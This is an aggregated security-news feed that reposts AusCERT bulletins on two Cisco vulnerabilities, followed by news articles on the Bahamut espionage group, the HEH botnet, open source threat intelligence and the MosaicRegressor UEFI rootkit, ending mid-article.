ESB-2020.3476 – [Cisco] Cisco Vision Dynamic Signage Director: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3476
Cisco Vision Dynamic Signage Director Missing Authentication Vulnerability
                              8 October 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Cisco Vision Dynamic Signage Director
Publisher:         Cisco Systems
Operating System:  Cisco
Impact/Access:     Modify Arbitrary Files   -- Remote/Unauthenticated
                   Access Confidential Data -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-3598  

Original Bulletin: 
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cvdsd-missing-auth-rQO88rnj

- --------------------------BEGIN INCLUDED TEXT--------------------

Cisco Vision Dynamic Signage Director Missing Authentication Vulnerability

Priority:        Medium

Advisory ID:     cisco-sa-cvdsd-missing-auth-rQO88rnj

First Published: 2020 October 7 16:00 GMT

Version 1.0:     Final

Workarounds:     No workarounds availableCisco Bug IDs:   CSCvv21344

CVE-2020-3598    

CWE-306

Summary

  o A vulnerability in the web-based management interface of Cisco Vision
    Dynamic Signage Director could allow an unauthenticated, remote attacker to
    access confidential information or make configuration changes.

    The vulnerability is due to missing authentication for a specific section
    of the web-based management interface. An attacker could exploit this
    vulnerability by accessing a crafted URL. A successful exploit could allow
    the attacker to obtain access to a section of the interface, which they
    could use to read confidential information or make configuration changes.

    Cisco has released software updates that address this vulnerability. There
    are no workarounds that address this vulnerability.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/
    cisco-sa-cvdsd-missing-auth-rQO88rnj

Affected Products

  o Vulnerable Products

    At the time of publication, this vulnerability affected Cisco Vision
    Dynamic Signage Director releases earlier than Release 6.2 SP6.

    See the Details section in the bug ID(s) at the top of this advisory for
    the most complete and current information.

    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by this vulnerability.

Workarounds

  o There are no workarounds that address this vulnerability.

Fixed Software

  o When considering software upgrades , customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories page , to determine exposure and a complete
    upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new release.
    If the information is not clear, customers are advised to contact the Cisco
    Technical Assistance Center (TAC) or their contracted maintenance
    providers.

    Fixed Releases

    At the time of publication, Cisco Vision Dynamic Signage Director releases
    6.2 SP6 and later contained the fix for this vulnerability.

    See the Details section in the bug ID(s) at the top of this advisory for
    the most complete and current information.

Exploitation and Public Announcements

  o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
    any public announcements or malicious use of the vulnerability that is
    described in this advisory.

Source

  o This vulnerability was found during internal security testing.

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy . This document also
    contains instructions for obtaining fixed software and receiving security
    vulnerability information from Cisco.

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/
    cisco-sa-cvdsd-missing-auth-rQO88rnj

Revision History

  o +----------+---------------------------+----------+--------+--------------+
    | Version  |        Description        | Section  | Status |     Date     |
    +----------+---------------------------+----------+--------+--------------+
    | 1.0      | Initial public release.   | -        | Final  | 2020-OCT-07  |
    +----------+---------------------------+----------+--------+--------------+

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBX36JquNLKJtyKPYoAQiMvQ//VMpPWqA6lieRWG0tJT3RGHgq5S/nOxpD
e8uzHxyC3gnqhOhHIJfDzgM2g8BNpIbrBEPYdqfw/J2y6AQM+VdRfoqY6JD6Fv73
f9tDjwhFCHcqsqGfxbnQTKFNdVOgu0ItjYdVeXoKj31S6mpPTNTMJbGFoi7F35ym
f0lZazQTqEvne0TfXWdS7yyeOgh15VEqLAJkmNZneEgfQY2lm1/cW1oW2vJe9sHN
SMDlTsthf1TLGsDO/wQWGtCBUsXnFKxpWAoU+HI0RDhvPRTE9hyiFyaBkmaXBEtW
SGnt1Fnn1yFOBss5pwSyWvTAFaSMX5EdOth4/RJyeLk+f5BIBSi9Iz1MZkAsABxx
DPP2MeIZmaPlCKGRRlrsUA49zuzpfQKqd1Z5OI5w7VV1F7ikhX33bjyqjy09pCCS
7ow8NszffC6afEElApHGn09LiSkIEAVAEjEGjZph1ngGOcAqs/n+qaUsxou5NTEE
Cd5nfMjPikyIPCYoH6dguONRnX/TuH46StF/hp0LHxy0+gQnZKEUvHr5mDxXuGDV
mQNsWT89jZJD1ahYJRE2Bhl/CuHzYSfEv11l4bdOIDsT1lTkr5GtHFLccZpJw+Qw
eZNaznNKwhvH2qdlKU1ZMUlfkxm3QGreuJoEAP0pxa2JmB0LR7VBV6U8btCG4gXb
61hiSBycots=
=M17/
-----END PGP SIGNATURE-----

Read More

The post ESB-2020.3476 – [Cisco] Cisco Vision Dynamic Signage Director: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2020/10/08/esb-2020-3476-cisco-cisco-vision-dynamic-signage-director-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2020-3476-cisco-cisco-vision-dynamic-signage-director-multiple-vulnerabilities

ESB-2020.3477 – [Win] Cisco Webex Teams client for Windows: Execute arbitrary code/commands – Existing account

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3477
     Cisco Webex Teams Client for Windows DLL Hijacking Vulnerability
                              8 October 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Cisco Webex Teams client for Windows
Publisher:         Cisco Systems
Operating System:  Windows
Impact/Access:     Execute Arbitrary Code/Commands -- Existing Account
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-3535  

Original Bulletin: 
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-teams-dll-drsnH5AN

- --------------------------BEGIN INCLUDED TEXT--------------------

Cisco Webex Teams Client for Windows DLL Hijacking Vulnerability

Priority:        High

Advisory ID:     cisco-sa-webex-teams-dll-drsnH5AN

First Published: 2020 October 7 16:00 GMT

Version 1.0:     Final

Workarounds:     No workarounds availableCisco Bug IDs:   CSCvu86655

CVE-2020-3535    

CWE-427

Summary

  o A vulnerability in the loading mechanism of specific DLLs in the Cisco
    Webex Teams client for Windows could allow an authenticated, local attacker
    to load a malicious library. To exploit this vulnerability, the attacker
    needs valid credentials on the Windows system.

    The vulnerability is due to incorrect handling of directory paths at run
    time. An attacker could exploit this vulnerability by placing a malicious
    DLL file in a specific location on the targeted system. This file will
    execute when the vulnerable application launches. A successful exploit
    could allow the attacker to execute arbitrary code on the targeted system
    with the privileges of another user's account.

    Cisco has released software updates that address this vulnerability. There
    are no workarounds that address this vulnerability.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/
    cisco-sa-webex-teams-dll-drsnH5AN

Affected Products

  o Vulnerable Products

    This vulnerability affects Cisco Webex Teams for Windows releases
    3.0.13464.0 through 3.0.16040.0.

    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by this vulnerability.

    Cisco has confirmed that this vulnerability does not affect the following
    Cisco products:

       Webex Teams for Android
       Webex Teams for iPhone and iPad
       Webex Teams for Mac

Workarounds

  o There are no workarounds that address this vulnerability.

Fixed Software

  o Cisco has released free software updates that address the vulnerability
    described in this advisory. Customers may only install and expect support
    for software versions and feature sets for which they have purchased a
    license. By installing, downloading, accessing, or otherwise using such
    software upgrades, customers agree to follow the terms of the Cisco
    software license:
    https://www.cisco.com/c/en/us/products/end-user-license-agreement.html

    Additionally, customers may only download software for which they have a
    valid license, procured from Cisco directly, or through a Cisco authorized
    reseller or partner. In most cases this will be a maintenance upgrade to
    software that was previously purchased. Free security software updates do
    not entitle customers to a new software license, additional software
    feature sets, or major revision upgrades.

    When considering software upgrades , customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories page , to determine exposure and a complete
    upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new release.
    If the information is not clear, customers are advised to contact the Cisco
    Technical Assistance Center (TAC) or their contracted maintenance
    providers.

    Customers Without Service Contracts

    Customers who purchase directly from Cisco but do not hold a Cisco service
    contract and customers who make purchases through third-party vendors but
    are unsuccessful in obtaining fixed software through their point of sale
    should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c
    /en/us/support/web/tsd-cisco-worldwide-contacts.html

    Customers should have the product serial number available and be prepared
    to provide the URL of this advisory as evidence of entitlement to a free
    upgrade.

    Fixed Releases

    Cisco fixed this vulnerability in Cisco Webex Teams for Windows releases
    3.0.16269.0 and later.

    For information about updating the client , see the Update the Cisco Webex
    Teams App to the Latest Release help article.

Exploitation and Public Announcements

  o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
    any public announcements or malicious use of the vulnerability that is
    described in this advisory.

Source

  o Cisco would like to thank Hou JingYi of Qihoo 360 CERT for reporting this
    vulnerability.

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy . This document also
    contains instructions for obtaining fixed software and receiving security
    vulnerability information from Cisco.

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/
    cisco-sa-webex-teams-dll-drsnH5AN

Revision History

  o +----------+---------------------------+----------+--------+--------------+
    | Version  |        Description        | Section  | Status |     Date     |
    +----------+---------------------------+----------+--------+--------------+
    | 1.0      | Initial public release.   | -        | Final  | 2020-OCT-07  |
    +----------+---------------------------+----------+--------+--------------+

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBX36JzeNLKJtyKPYoAQgtOQ//U0FsptJb+AKnpNsoOHwgMw45+/qG7/BU
Rh3YN5f25vsC37vmKK55esTXIC/ENGzJO+O88L60MArV4GpJhJIYCyxRQtPToKmy
gImlmo2HV/7fDNRmoRVWCaB2Vib5HXUnu9YXE00NaTqxd/RIfDGJH8/K3K+sk5hu
JXFTRk1MwiYbLPhMjz36kRtfiTa+nyA9WWzXzHqWPPj8vzVHAix9H+wI/9WKl50Q
fgTkHUJy3Af5kB6kPciUo5FK5j5t01jMS3WiOGZAozYFhGLSbDfruk3y56TSfAc1
w55zDDga08hvPyyabSS1CBIto/s8z+PQt0cJSpXqy/FzmaSPxEW0dau90p2+vREM
hDswICHC2zFLdgTvSrGCTSaupv1ShqcfJa70hc6UJN3JWgyXFKSr1LAXVVlwMgsV
JGRi+OESwDBSady/4DRG5g78NvBuPoxyC0rCfGPJrSP6OYVHn2ZjRcfFkgIJXTFM
nJd9HUb9R0UNL4HZkn3MH/IZBECY6/r8kz/eo0hLcJ/SHAoJx3bc1r7rU5T0H6KH
MIIKI8eZjcz5wz8VHXSlVLZttKbkLScqHHlWZOrI1lDNaCW2muQoJ0tOVC1L5bCM
FJS7xaRKf436NvD3EeSD3Iz8vfJMRwTZW1SKOXY1go84EkQ5VDkH1Fv5PFc/LZZn
0KSPgDWrGME=
=wLiL
-----END PGP SIGNATURE-----

Read More

The post ESB-2020.3477 – [Win] Cisco Webex Teams client for Windows: Execute arbitrary code/commands – Existing account appeared first on Malware Devil.

https://malwaredevil.com/2020/10/08/esb-2020-3477-win-cisco-webex-teams-client-for-windows-execute-arbitrary-code-commands-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2020-3477-win-cisco-webex-teams-client-for-windows-execute-arbitrary-code-commands-existing-account

Network Security News Summary for Thursday October 8 2020

A brief daily summary of what is important in cybersecurity. The podcast is published every weekday and designed to get you ready for the day with a brief, usually about 5 minutes long, summary of current network security-related events. The content is late breaking, educational and based on listener input as well as on input received by the SANS Internet Storm Center. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html .

The post Network Security News Summary for Thursday October 8 2020 appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/network-security-news-summary-for-thursday-october-8-2020/?utm_source=rss&utm_medium=rss&utm_campaign=network-security-news-summary-for-thursday-october-8-2020

‘Bahamut’ Threat Group Targets Government & Industry in Middle East

Researchers say the cyber espionage group was involved in several attacks against government officials and businesses in the Middle East and South Asia.

A hack-for-hire cyberespionage group named Bahamut is involved in advanced attacks targeting government officials and organizations with sophisticated credential harvesting attacks and phishing campaigns, new Windows malware samples, zero-day exploits, and other techniques.

BlackBerry researchers who have been tracking Bahamut say the group is politically motivated and has a wide range of targets. The group has historically targeted people and entities in South Asia, particularly India and Pakistan, as well as the Middle East, primarily the UAE and Qatar. Its interests remain concentrated in South Asia and the Persian Gulf, researchers report.

In its latest writeup, the BlackBerry team builds on research published in 2018 that references a group called “The White Company,” explains vice president of research operations Eric Milam. Through this, they were able to connect more dots and add previous findings from other researchers who have tracked the group’s activity. Bahamut, named by researchers with open source intelligence site Bellingcat, has also been called “Ehdevel,” Windshift,” and Urpage.”

Despite its range of targets and attacks, a lack of discernible pattern or unifying motive leads researchers to believe Bahamut is likely acting as hack-for-hire operators. They believe the group has access to one zero-day developer and has leveraged zero-day exploits against multiple targets, “reflecting a skill-level well beyond most other known threat actor groups,” researchers state in their report.

“Bahamut executed highly disparate targeting across a number of verticals and geographic regions, [which] suggests a mercenary, hack-for-hire group acting in the interest of multiple sponsors,” says Milam. The varied nature of its activity indicates the group is likely for profit; some findings indicate it has dabbled in India’s private corporate intelligence market, he says.

While Bahamut’s activity in the Middle East has targeted private businesses and individuals, most of its attacks are aimed at government. In Saudi Arabia it went after seven different ministries and other agencies, with a focus on monetary and financial policy. It also targeted the Emirates, Qatar, Bahrain, and Kuwait, with an emphasis on foreign policy and defense.

BlackBerry did not list most of Bahamut’s targets by name, though it provided a general list that includes Middle East human rights activists, the Saudi Minister of Energy, Union of Arab Banks, journalists and foreign press in Egypt, Saudi Aramco, and Turkish government officials.

While attribution is difficult, BlackBerry believes Bahamut is located close to the regions it’s operating against and targeting people, businesses, government agencies, human rights groups, and political groups in South Asia and the Gulf, as well as in Europe, Africa, and China.

Inside Bahamut’s Advanced Attacks
The group tailored its attacks for each target depending on the victim’s preferred operating system and communication medium, Milam says. Its techniques depended on who they were trying to phish. Government officials, for example, were approached through their personal email before attackers tried to hack their work accounts.

“Their tradecraft is exceptional, meaning they truly have planned out each step and understand their capabilities and their targets,” Milam says.

Phishing and credential harvesting are aimed at precise targets and fueled by a robust reconnaissance operation. Researchers discovered phishing attempts designed to spoof government agency logins, private email accounts, and account portals from Microsoft Live, Gmail, Apple ID, Yahoo!, Twitter, Facebook, Telegram, OneDrive, and ProtonMail.

Its spear-phishing operations ranged from a few hours to multiple months, depending on the success rates. This rate of change makes real-time detection “all but impossible,” researchers state in their report. Bahamut learns from its mistakes: The group monitors for information published about them in the security community. When exposed, it changes its strategy quickly.

Attackers’ operational security makes them difficult to track, Milam continues. The group’s phishing and malware infrastructure is kept separate and changed weekly – sometimes daily. It’s known to reuse tools and infrastructure of other APT groups and builds anti-analysis features into its exploits and shellcode.

Bahamut often uses publicly available malware, which also impedes attribution efforts, but Milam notes it mostly uses malware as a last resort. Malware can signal an attacker is in the network; the longer malware is on a system, the higher its chances of being detected.

“The attackers were often able to achieve what they wanted [get information] via legitimate credentials for online services,” Milam says. “Once they had access to primary email accounts, they could generally watch and gain access to other systems or online portals of interest.”

Fake Apps and Fake News
Bahamut’s attacks in the Middle East take a broader approach with malicious mobile apps, which researchers say appear to be designed for general audiences. Fake apps targeting South Asia, however, were mostly politically themed and targeted groups such as Sikhs for Justice.

BlackBerry’s research uncovered nine malicious iOS applications and several Android apps that experts attribute to the group based on configuration and unique network service fingerprints. The apps came with websites, privacy policies, and terms of service – all things attackers typically overlook – that researchers say helped bypass Apple’s and Google’s security defenses.

Several of these Android apps were built by different developers. They included an app for recording phone calls, music players, a video player, and an app for notifying Muslims of prayer times during Ramadan. Bahamut used several of its own websites to distribute malicious apps.

Researchers found the apps they investigated were intended for targets in the UAE, as their downloads were restricted to the Emirates. Further, Ramadan-themed apps, as well as those invoking the Sikh separatist movement, indicate intent to target political and religious groups.

Bahamut uses carefully crafted websites to distribute fraudulent news. In one case, attackers took over a cybersecurity website and published articles about research, geopolitics, and news about other hacking groups. This website posted a list of contributors that were fake but used names and photos belonging to real reporters. Some of its fake websites tried to boost their legitimacy with connected social media accounts.

In many cases, targets who read Bahamut’s original websites would read original content – no malware, phishing, or malicious links. The operation was designed to tailor websites to their victims’ interests and, in doing so, make them appear as real as possible. Bahamut’s best interest, the researchers say, was to lure targets into its “vast fake empire.”

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial … View Full Bio

Recommended Reading:

Comment |

Email This |

Print |

RSS

More Insights

Webcasts

[Free Virtual Event] Managing Apps in a Multi-Cloud Environment

More Webcasts

White Papers

The High Cost of Poor Web Performance

More White Papers

Reports

InformationWeek & Network Computing Report Round Up

More Reports

The post ‘Bahamut’ Threat Group Targets Government & Industry in Middle East appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/bahamut-threat-group-targets-government-industry-in-middle-east/?utm_source=rss&utm_medium=rss&utm_campaign=bahamut-threat-group-targets-government-industry-in-middle-east

New ‘HEH’ Botnet Targets Exposed Telnet Services

Latest threat is one in a growing list of malware developed in the Go programming language.

A potentially destructive peer-to-peer (P2P) botnet has surfaced and is targeting a broad variety of Internet of Things (IoT) devices with exposed or weakly protected telnet services.

Researchers at China-based 360NetLab, who recently discovered the so-called HEH botnet this week, described the malware as capable of wiping all data from infected systems. According to the security vendor, the botnet poses a threat to any device with an exposed telnet service regardless of whether the device is based on x86, ARM, MIPS, PPC, or any other chip architecture.

The malware has been observed spreading via brute-force attacks against servers, routers, and other Internet-connected systems with exposed SSH ports 23 and 2323. The bot — like a growing number of malware tools — is written in GO code. It uses a proprietary P2P protocol to communicate with other infected devices and receive commands. The malware packs three separate components: a P2P module, a module for propagation, and a local HTTP service.

The bot samples 360NetLab analyzed were downloaded and executed via a malicious Shell script. The malicious code does not make any attempt to enumerate the environment it is on. Instead, it just downloads and executes malicious programs for a variety of different CPU architectures one after the other, 360NetLab said. The script and binaries the security vendor analyzed were hosted on a legitimate but likely compromised website.

Once started, the malware kills off multiple services on the infected device depending on the port (23 or 2323) that was used to gain access. Then it starts an HTTP server that initially pulls up a copy of the “Universal Declaration of Human Rights” in Chinese and seven other languages. This initial content is quickly overwritten with data pulled from another infected peer on the botnet, 360NetLab said.

According to the vendor, a self-destruct function in the malware is especially noteworthy. “When the Bot receives a [command] with code number 8, the Bot will try to wipe out everything on all the disks” through a series of Shell commands,” the vendor said.

360NetLab’s report did not offer insight into whether the HEH botnet would be used to launch distributed denial-of-service (DDoS) attacks, distribute spam and malware, or for other purposes. For the moment, at least, the botnet’s attack function has not been implemented, which suggests the HEH botnet is still in development, the security vendor said.

An Ongoing Trend
The HEH bot is part of a growing number of SSH-targeting malware tools written in the Go programming language that have been observed lately. They represent a shift from older IoT malware like Mirai that were developed C or other programming languages like Perl and C++. This year alone, multiple vendors and researchers have reported IoT bots written in Go, including Kaiji, IRCflu, and more recently FritzFrog, a peer-to-peer botnet that has been actively compromising SSH servers since the beginning of this year.

Craig Young, computer security researcher at Tripwire’s vulnerability and exposure research team, says the growing popularity of Go among threat actors in interesting. The HEH botnet is one in a series of Go-language-based botnets that appear to be coming out of a small group of malware developers. It suggests either a new generation of malware authors or a new wave of capabilities.

“Go is a very powerful programming language with a wide library of community supported modules,” Young says.

Go enables developers to manipulate very low-level behaviors, he notes.

“Malware authors may leverage this to thwart analysis attempts by using custom variations of compression or encryption algorithms,” he says.

While malware developed in Go does not necessarily complicate defenses for organizations, it does require them to update their toolkits in some circumstances, Young noted.

The HEH botnet poses little risk to organizations in its current form. For the moment, the malware has only been observed targeting exposed telnet services, which no responsible organization should have, he says.

“For most organizations, the threat of this botnet at this time is minimal, but it could certainly evolve,” Young says. “An update to the malware can be pushed out at any moment to introduce new attack and propagation techniques.”

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Recommended Reading:

Comment |

Email This |

Print |

RSS

More Insights

Webcasts
More Webcasts

White Papers

The High Cost of Poor Web Performance

More White Papers

Reports

InformationWeek & Network Computing Report Round Up

More Reports

The post New ‘HEH’ Botnet Targets Exposed Telnet Services appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/new-heh-botnet-targets-exposed-telnet-services/?utm_source=rss&utm_medium=rss&utm_campaign=new-heh-botnet-targets-exposed-telnet-services

Open Source Threat Intelligence Searches for Sustainable Communities

As long as a community is strong, so will be the intelligence it shares on open source feeds. But if that community breaks down …

When the Computer Incident Response Center in Luxembourg (CIRCL) analyzes incidents for threat information, the group deals mostly with proprietary, sensitive, and, in some cases, classified information from companies and the communities with whom the incident response team regularly works.

Yet the group also relies heavily on open source intelligence as a way to eliminate the noise of known threats and reduce the workload for the group’s operators, says Andras Iklody, a CIRCL operator and a core developer for the MISP threat-intelligence sharing platform. Open source threat intelligence lets the group bootstrap its analyses and helps reduce its workload quickly to instead focus on novel threats, he says.

“It makes our lives easier by getting the low-hanging fruit out of the way,” Iklody says. “Even though we are not using it directly for detection purposes — which we could, depending on the source — it is already a huge help in, for example, figuring out quickly what we are dealing with. Is it something that is already known? Or is it something that we should spend more time with?”

Open source intelligence feeds are getting better in many ways. For example, the information is typically more focused and better vetted than in the past. But there are potential pitfalls, say experts. Because filtering bad data out of a threat feed is time-consuming and difficult, open source threat intelligence often lags behind the intelligence provided by other sources. On the other hand, some automated or crowdsourced systems — such as AbuseIPDB, a database of Internet-address reputations — can find early indicators of maliciousness.

The good and bad represent the relationship that open source threat intelligence has to the volunteers in the community that give their time to create the tools and analyze potential threats, says Karl Sigler, senior security research manager at Trustwave. While massive efforts can result in powerful sources of threat data, often such communities can disappear if interest wanes.

“As long as the community remains strong, then the open source feeds will remain,” he says. “But the communities tend to break down, so you can’t always rely on the feeds being there.”

However, open source threat intelligence feeds and commercial feeds typically do not cover the same ground, making any decision difficult. In August research, researchers from universities in the Netherlands and Germany compared threat indicators from four open source threat intelligence feeds and two commercial feeds, finding very little overlap in the data sources. A comparison of indicators on 22 threat groups found the feeds had, at most, only 4% of threat indicators in common.

Getting Started
For most companies, the most valuable threat intelligence is data from their own network flows and security logs. Companies getting started in threat intelligence should focus on joining a sector- or industry-specific threat information exchange group, MISP’s Iklody advises. Such groups will not only alert member companies to potential threats, but they will also have industry-specific best practices that can help shore up an organization’s defenses.

“Get together with similar organization that you can exchange information with,” he says. “If you are working in a specific sector and you can join an ISAC, do that and get the information they can share with you.”

Any company using threat intelligence should make sure it is consuming the data from the feeds appropriately and with a skeptical eye. The technical indicators of a specific threat targeting one organization may be significantly different from the indicators of the same threat attacking another organization, says Andrew Morris, founder of threat-data enrichment startup GreyNoise Intelligence.

“To figure out where the badness is that’s the most relevant to you, you go through some process on your network,” he says.

Companies can combine data from their own networks and environments, and query that data, to glean information about the specific threats that impact their users.

“One of the issues is [because] there are so many threat feeds that are so large and have so little context and change so rapidly, it is very costly to try to implement all the different intel feeds and weed out false positives and derive value,” Morris says.

The public nature of open source threat intelligence feeds can also be a weakness. Not only do companies have to consider how much detail to release openly, but often such public disclosure will be a warning to attackers to change their behavior, thus becoming harder to detect, says Maurits Lucas, director of intelligence for Intel471, a commercial threat intelligence provider.

“Some of the bits you cannot publish in open source because open source is available to the very people you are observing,” he says. “So whatever you are publishing will be the first and last [indicator] that you will publish on that particular source.”

Reality Check
Can weaknesses in open source intelligence be fixed? The economics of information sharing and the value added by companies in vetting their commercial threat-intelligence feeds make it unlikely.

MISP’s Iklody points to the impact of forced sharing as an example. When an information-sharing organization in the Asia-Pacific region required members to share a certain amount of data every month to retain their membership, many smaller companies did not have regular incident information. Instead, the companies reclassified minor concerns as threats and ended up flooding the groups’ feeds with noise, he says.

Those types of approaches, meant to solve the contribution problems of open source, underscore the asymmetry between the larger companies with mature security programs and smaller industry players that primarily end up lurking on such information feeds.

“Whenever you have a requirement that people share information, it backfires,” Iklody says. “There are some exceptions to that, but in many cases organizations cannot produce data fast enough, or they start flooding the community with junk.”

Still, for companies just starting out in threat intelligence, it can be a way to work with standardized forms of reporting and analyzes that are widely taught, Trustwave’s Sigler says.

“I always recommend starting out with open source, not just with intel feeds but with all security,” he says. “It lets you dip your toe in the water without a commitment. I see so many times that people commit to a product that just sits on their shelf.”

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Recommended Reading:

Comment |

Email This |

Print |

RSS

More Insights

Webcasts

[Free Virtual Event] Managing Apps in a Multi-Cloud Environment

More Webcasts

White Papers

The High Cost of Poor Web Performance

More White Papers

Reports

InformationWeek & Network Computing Report Round Up

2019 Threat Hunting Report

More Reports

The post Open Source Threat Intelligence Searches for Sustainable Communities appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/open-source-threat-intelligence-searches-for-sustainable-communities/?utm_source=rss&utm_medium=rss&utm_campaign=open-source-threat-intelligence-searches-for-sustainable-communities

Rare Firmware Rootkit Discovered Targeting Diplomats, NGOs

Second-ever sighting of a firmware exploit in the wild is a grim reminder of the dangers of these mostly invisible attacks.

It’s a silent and deadly threat long dreaded by security experts: malware entrenched in the firmware of modern computer chips that can’t be expelled by reinstalling the operating system or even wiping or replacing the hard drive.

These mostly invisible firmware rootkit — aka bootkit — attacks thus far have been very rare, but researchers at Kaspersky have discovered one in the wild. The custom rootkit compromised the Unified Extensible Firmware Interface (UEFI) in computer chips that handles system booting and loading the operating system. The malware implant, which was just one module found in a larger attack framework Kaspersky named MosaicRegressor, appears to be written by a Chinese-speaking actor, based on several artifacts and language clues in it, the researchers say.

The attackers pointed MosaicRegressor at African, Asian, and European diplomatic and nongovernmental organizations between 2017 and 2019. Two victims of were found with the UEFI bootkit infection. All of the targets had some link to North Korea interests, either as nonprofits focused on the country or with locations there.

This is only the second known case of a bootkit attack: The first, revealed two years ago by ESET, was used by the Russian nation-state hacking group Fancy Bear, aka Sednit/Sofacy/APT28, best known for its 2016 attack on the Democratic National Committee. The so-called LoJax malware basically exploited Absolute Software’s LoJack computer anti-theft software embedded in many machines.

“That was truly a significant finding,” said Mark Lechtik, senior security researcher at Kaspersky, who along with colleague Igor Kuznetsov detailed their research at Kaspersky’s [email protected] virtual event this week. What sets this second UEFI rootkit apart from the previous one, Lechtik said, is that’s a customized version of one developed by HackingTeam, the controversial zero-day exploit development firm out of Italy known for selling advanced attack modules to governments.

HackingTeam itself got hacked and doxed five years ago, and much of its code, including that of a UEFI rootkit, is now living on GitHub for researchers and attackers alike to experiment with.

